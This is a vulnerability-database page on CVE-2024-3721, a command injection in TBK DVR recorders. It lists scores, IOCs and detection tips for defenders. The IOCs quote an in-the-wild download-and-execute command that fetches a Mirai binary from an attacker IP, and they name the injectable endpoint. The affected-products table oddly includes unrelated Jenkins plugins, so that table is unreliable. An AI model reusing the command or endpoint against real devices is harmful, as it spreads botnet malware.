cbcvebase.
CVE-2024-3721
published 2024-04-13

CVE-2024-3721: A vulnerability was found in TBK DVR-4104 and DVR-4216 up to 20240412 and classified as critical. This issue affects some unknown processing of the file…

PriorityP181medium6.3CVSS 3.1
AVNACLPRLUINSUCLILAL
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
86.49%
99.7th percentile
A vulnerability was found in TBK DVR-4104 and DVR-4216 up to 20240412 and classified as critical. This issue affects some unknown processing of the file /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___. The manipulation of the argument mdb/mdc leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260573 was assigned to this vulnerability.

Affected

6 ranges
VendorProductVersion rangeFixed in
jenkinsgit_server_plugin
jenkinsscript_security_plugin
jenkinssubversion_partial_release_manager_plugin
jenkinstelegram_bot_plugin
tbkdvr-4104
tbkdvr-4216

Detection & IOCsextracted from sources · hover to see the quote

url/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
commandcd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
ip42.112.26[.]36
filenamearm7
filenameselftbk.sh
hash011a406e89e603e93640b10325ebbdc8
hash24fd043f9175680d0c061b28a2801dfc
hash29b83f0aae7ed38d27ea37d26f3c9117
hash2e9920b21df472b4dd1e8db4863720bf
hash3120a5920f8ff70ec6c5a45d7bf2acc8
hash3c2f6175894bee698c61c6ce76ff9674
hash45a41ce9f4d8bb2592e8450a1de95dcc
hash524a57c8c595d9d4cd364612fe2f057c
hash74dee23eaa98e2e8a7fc355f06a11d97
hash761909a234ee4f1d856267abe30a3935
hash7eb3d72fa7d730d3dbca4df34fe26274
hash8a3e1176cb160fb42357fa3f46f0cbde
hash8d92e79b7940f0ac5b01bbb77737ca6c
hash95eaa3fa47a609ceefa24e8c7787bd99
hash96ee8cc2edc8227a640cef77d4a24e83
hashaaf34c27edfc3531cf1cf2f2e9a9c45b
hashba32f4eef7de6bae9507a63bde1a43aa
ip116.203.104[.]203
ip130.61.64[.]122
ip161.97.219[.]84
ip130.61.69[.]123
ip185.84.81[.]194
ip54.36.111[.]116
ip192.3.165[.]37
ip162.243.19[.]47
ip63.231.92[.]27
ip80.152.203[.]134
bytes
RC4 key: 6e7976666525a97639777d2d7f303177
  • Detect CVE-2024-3721 exploitation attempts by monitoring for POST requests to the path /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ with mdb/mdc parameters containing shell commands.
  • Flag the misspelled User-Agent string 'Mozila/5.0' (single 'l') in HTTP requests, which is a distinctive indicator of this exploit campaign.
  • Detect the Mirai variant's anti-VM behavior: the malware enumerates /proc/<PID>/cmdline looking for 'VMware' or 'QEMU-arm' strings to check if it is running in a virtual environment.
  • Kaspersky detects the implant under the signatures HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.
  • The Nexcorium botnet campaign (reported by FortiGuard Labs) uses HTTP response headers containing 'X-Hacked-By: Nexus Team - Exploited By Erratic' as a campaign marker.
  • ·The vulnerability affects TBK DVR-4104 and DVR-4216 devices but has also been re-branded under multiple vendor names; patch availability is uncertain across all brands.

CVSS provenance

nvdv3.16.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
ghsa4.3MEDIUM
vulncheck6.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.